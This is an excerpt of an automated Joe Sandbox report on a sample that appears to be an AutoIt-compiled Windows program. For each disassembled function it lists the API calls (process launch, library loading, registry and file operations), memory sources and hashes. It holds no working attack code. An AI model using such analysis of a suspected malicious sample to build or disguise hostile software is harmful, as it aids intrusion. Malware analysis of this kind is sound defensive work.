                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ItemMenu$Info_wcslen$Default
                                              • String ID: 0
                                              • API String ID: 1227352736-4108050209
                                              • Opcode ID: 26ca4bbb5e410d2b798852974cfed8e45321c7f29860298351650ca876130825
                                              • Instruction ID: 30d0f4abd4db1180764fbcd75b66ba29fd7c9967efae66db35f0b9709d205825
                                              • Opcode Fuzzy Hash: 26ca4bbb5e410d2b798852974cfed8e45321c7f29860298351650ca876130825
                                              • Instruction Fuzzy Hash: 4251B371624302ABD7159F28C845B6B77E4EF85314F082A2EF595E32E0EB70D948DB72
                                              Function 00DFAD64 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                              Download Yara Rule
                                              APIs
                                              • ShellExecuteExW.SHELL32(0000003C), ref: 00DFAEA3
                                                • Part of subcall function 00D77620: _wcslen.LIBCMT ref: 00D77625
                                              • GetProcessId.KERNEL32(00000000), ref: 00DFAF38
                                              • CloseHandle.KERNEL32(00000000), ref: 00DFAF67
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: CloseExecuteHandleProcessShell_wcslen
                                              • String ID: <$@
                                              • API String ID: 146682121-1426351568
                                              • Opcode ID: 0b3331df716db06d91753014c9ab6ee870213a75aff9271897f5d120bc2b9e0a
                                              • Instruction ID: a50873a4f72bde8ac65ec4a5ea5f174922bc1a366609827d9baf573611b64d35
                                              • Opcode Fuzzy Hash: 0b3331df716db06d91753014c9ab6ee870213a75aff9271897f5d120bc2b9e0a
                                              • Instruction Fuzzy Hash: 357158B1A00219DFCB14DF58C484AAEBBF0EF08310F15C499E95AAB352D774ED45CBA1
                                              Function 00DD719E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120comlibraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00DD7206
                                              • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 00DD723C
                                              • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 00DD724D
                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00DD72CF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: ErrorMode$AddressCreateInstanceProc
                                              • String ID: DllGetClassObject
                                              • API String ID: 753597075-1075368562
                                              • Opcode ID: d196e76f56c9c5e7f797610cd29806308f15df78b733504c1fa0307e33ef0697
                                              • Instruction ID: f25833b209aada6dc170737c7b385ee65b4e0fcf5064c90542c2c161241c7863
                                              • Opcode Fuzzy Hash: d196e76f56c9c5e7f797610cd29806308f15df78b733504c1fa0307e33ef0697
                                              • Instruction Fuzzy Hash: D9416A71A05204AFDB25CF54C885A9A7FB9EF44310F2480AEBD05AF30AE7B1D944CBB4
                                              Function 00DFC9EA Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen
                                              • String ID: HKEY_LOCAL_MACHINE$HKLM
                                              • API String ID: 176396367-4004644295
                                              • Opcode ID: a6a02ba32ad013ee4f86b0a1d9698948a62fbfcddaf868e1351ac97a1049f8e9
                                              • Instruction ID: 9bd94ecdf1234ac4e265a2601e59eafab48476a4fd226180a08c8227f3b893a2
                                              • Opcode Fuzzy Hash: a6a02ba32ad013ee4f86b0a1d9698948a62fbfcddaf868e1351ac97a1049f8e9
                                              • Instruction Fuzzy Hash: 06314573A2016D4ACB20DF2C8A514BE37919BA1750F0FE029E945AB245FA70ED60C3B0
                                              Function 00E02F17 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00E02F8D
                                              • LoadLibraryW.KERNEL32(?), ref: 00E02F94
                                              • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00E02FA9
                                              • DestroyWindow.USER32(?), ref: 00E02FB1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: MessageSend$DestroyLibraryLoadWindow
                                              • String ID: SysAnimate32
                                              • API String ID: 3529120543-1011021900
                                              • Opcode ID: 67aaba7a6c0e32742f4fbc6e2ebf654683bfb4ae41df8835a567c4b75d79cbfd
                                              • Instruction ID: 20bea19e2cca3213fefeec46948e7e6c4b2ee6fbbc30d4d86de5a49f07472b1f
                                              • Opcode Fuzzy Hash: 67aaba7a6c0e32742f4fbc6e2ebf654683bfb4ae41df8835a567c4b75d79cbfd
                                              • Instruction Fuzzy Hash: 9B218E71200206AFEB215F649C48EBB77F9EB593A8F20621CFA50B21D0D672DC919760
                                              Function 00D94D6D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00D94D1E,00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002), ref: 00D94D8D
                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00D94DA0
                                              • FreeLibrary.KERNEL32(00000000,?,?,?,00D94D1E,00DA28E9,?,00D94CBE,00DA28E9,00E388B8,0000000C,00D94E15,00DA28E9,00000002,00000000), ref: 00D94DC3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: AddressFreeHandleLibraryModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 4061214504-1276376045
                                              • Opcode ID: b068522b144e6cb2e3d93aedeb0cee8829a65826195a632cf6b6e3650548a947
                                              • Instruction ID: 338b402517130e5273bff0464b7ce4f186cd48ebdd3b3367c16ac38fc52246ee
                                              • Opcode Fuzzy Hash: b068522b144e6cb2e3d93aedeb0cee8829a65826195a632cf6b6e3650548a947
                                              • Instruction Fuzzy Hash: BDF0AF34A00208BFDB119F91DC09BEDBFB4EF04712F1401A4F809B22A0DB719985CBA1
                                              Function 00DCD3A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32 ref: 00DCD3AD
                                              • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00DCD3BF
                                              • FreeLibrary.KERNEL32(00000000), ref: 00DCD3E5
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: GetSystemWow64DirectoryW$X64
                                              • API String ID: 145871493-2590602151
                                              • Opcode ID: 836ae5a81872a861f97698a6af04f02231ba558da9f069b4ad1c74810e4b9ce0
                                              • Instruction ID: 1f9c767d5c14feffb56f758e1082c22435b68b54cdd9241ffc513447b42b88c9
                                              • Opcode Fuzzy Hash: 836ae5a81872a861f97698a6af04f02231ba558da9f069b4ad1c74810e4b9ce0
                                              • Instruction Fuzzy Hash: EDF020308026239BCB312B118C18F2AB222AF50B01F79927DE446F3080DB30CC8486F7
                                              Function 00D74E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E9C
                                              • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D74EAE
                                              • FreeLibrary.KERNEL32(00000000,?,?,00D74EDD,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74EC0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-3689287502
                                              • Opcode ID: 8ecf16a3c2aed7e2b0adc34dadfd7fc0a17d69e6d497923f4cff37255492768a
                                              • Instruction ID: 488e4abf6c036ddbc1d096ff4caeb2d6f814e067206ca71a43794f2bde2c1d96
                                              • Opcode Fuzzy Hash: 8ecf16a3c2aed7e2b0adc34dadfd7fc0a17d69e6d497923f4cff37255492768a
                                              • Instruction Fuzzy Hash: 5FE08636A026225FD22217266C18A6B6564AF81B72B194215FC04F2140EB64CD4585B1
                                              Function 00D74E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E62
                                              • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D74E74
                                              • FreeLibrary.KERNEL32(00000000,?,?,00DB3CDE,?,00E41418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D74E87
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Library$AddressFreeLoadProc
                                              • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                              • API String ID: 145871493-1355242751
                                              • Opcode ID: c86a7d35bbcf2672f9b2a07db6cb9e96965e3da00377082d1625d770c452ccd2
                                              • Instruction ID: 3d137ffd71a19b0ddeeed1fd33a61d6bce655ac73729c4994326b243347bcf82
                                              • Opcode Fuzzy Hash: c86a7d35bbcf2672f9b2a07db6cb9e96965e3da00377082d1625d770c452ccd2
                                              • Instruction Fuzzy Hash: A2D0C2325036316BC6231B266C0CD8B2A2CEF85B213195710B818F2154DF61CD41C6E0
                                              Function 00DFA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetCurrentProcessId.KERNEL32 ref: 00DFA427
                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DFA435
                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DFA468
                                              • CloseHandle.KERNEL32(?), ref: 00DFA63D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Process$CloseCountersCurrentHandleOpen
                                              • String ID:
                                              • API String ID: 3488606520-0
                                              • Opcode ID: a96e425212407c63e98166350c08812ebea6aff644c9b6b75c0255af96439fab
                                              • Instruction ID: 6cf49d80752408cc3c84fe063b1d9e9739cb0a680b0cf88ff91767919ff3568c
                                              • Opcode Fuzzy Hash: a96e425212407c63e98166350c08812ebea6aff644c9b6b75c0255af96439fab
                                              • Instruction Fuzzy Hash: FBA1A0B16047019FD720DF28C882B2AB7E5EF84714F14C85DF9599B392D770EC418BA2
                                              Function 00DDE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DDCF22,?), ref: 00DDDDFD
                                                • Part of subcall function 00DDDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DDCF22,?), ref: 00DDDE16
                                                • Part of subcall function 00DDE199: GetFileAttributesW.KERNEL32(?,00DDCF95), ref: 00DDE19A
                                              • lstrcmpiW.KERNEL32(?,?), ref: 00DDE473
                                              • MoveFileW.KERNEL32(?,?), ref: 00DDE4AC
                                              • _wcslen.LIBCMT ref: 00DDE5EB
                                              • _wcslen.LIBCMT ref: 00DDE603
                                              • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DDE650
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                              • String ID:
                                              • API String ID: 3183298772-0
                                              • Opcode ID: c4900e97570659a42c8aedafd2dd5866e93da01a925445155c40dcf64bd05161
                                              • Instruction ID: bc8f6b6f93d6cbabb44d3b3dbd37083d701383e31d64a1be2b9ba3da95b5cb67
                                              • Opcode Fuzzy Hash: c4900e97570659a42c8aedafd2dd5866e93da01a925445155c40dcf64bd05161
                                              • Instruction Fuzzy Hash: 6C5160B24087455BCB24EB90D8919DFB3DCEF84340F04491FF58997291EE74E5888776
                                              Function 00DFB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                                • Part of subcall function 00DFC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DFB6AE,?,?), ref: 00DFC9B5
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFC9F1
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA68
                                                • Part of subcall function 00DFC998: _wcslen.LIBCMT ref: 00DFCA9E
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DFBAA5
                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DFBB00
                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DFBB63
                                              • RegCloseKey.ADVAPI32(?,?), ref: 00DFBBA6
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00DFBBB3
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                              • String ID:
                                              • API String ID: 826366716-0
                                              • Opcode ID: 85a19c3d6072a31491426fc7388e9672bc5151fcacffbd03403b5d48fa7f410c
                                              • Instruction ID: 9cf3ba8e3c927599166ee7151a46e5f950d2edce8fdadc9e60a1d444de7b5fd6
                                              • Opcode Fuzzy Hash: 85a19c3d6072a31491426fc7388e9672bc5151fcacffbd03403b5d48fa7f410c
                                              • Instruction Fuzzy Hash: 54618B31208205AFD714DF14C890E2ABBE5FF84318F59C95DF5998B2A2DB31ED45CBA2
                                              Function 00DD8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON
                                              Download Yara Rule
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00DD8BCD
                                              • VariantClear.OLEAUT32 ref: 00DD8C3E
                                              • VariantClear.OLEAUT32 ref: 00DD8C9D
                                              • VariantClear.OLEAUT32(?), ref: 00DD8D10
                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DD8D3B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: Variant$Clear$ChangeInitType
                                              • String ID:
                                              • API String ID: 4136290138-0
                                              • Opcode ID: 82d7e54c2b952c00856bd12807b40a4c1719c562e3179c312cdeb9a0bf388059
                                              • Instruction ID: 31f71b9f42a74941c0da1113b583b62c596178e0876d0d1d6b1ecf3fb421755c
                                              • Opcode Fuzzy Hash: 82d7e54c2b952c00856bd12807b40a4c1719c562e3179c312cdeb9a0bf388059
                                              • Instruction Fuzzy Hash: 25517CB5A00219EFCB14CF69C884AAAB7F9FF89310B15855AF915DB350E730E911CFA0
                                              Function 00DE8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DE8BAE
                                              • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DE8BDA
                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DE8C32
                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DE8C57
                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DE8C5F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1796206991.0000000000D71000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1796179597.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E32000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000E55000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796206991.0000000000EB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796847653.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1796947043.0000000000EB8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_qlG7x91YXH.jbxd
                                              Similarity
                                              • API ID: PrivateProfile$SectionWrite$String
                                              • String ID:
                                              • API String ID: 2832842796-0
                                              • Opcode ID: 47378c8bf5465bf3f111506b1c777cad5a3960335ca37a4f622793f654a9051b
                                              • Instruction ID: 19740c85e3923673e32527a0c5cf7024b072977d3ff7f06ffb6a61d56de54367
                                              • Opcode Fuzzy Hash: 47378c8bf5465bf3f111506b1c777cad5a3960335ca37a4f622793f654a9051b
                                              • Instruction Fuzzy Hash: 35514835A00214AFCB05EF65C881A6DBBF5FF49314F18C458E849AB362DB31ED51DBA1
                                              Function 00DF8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
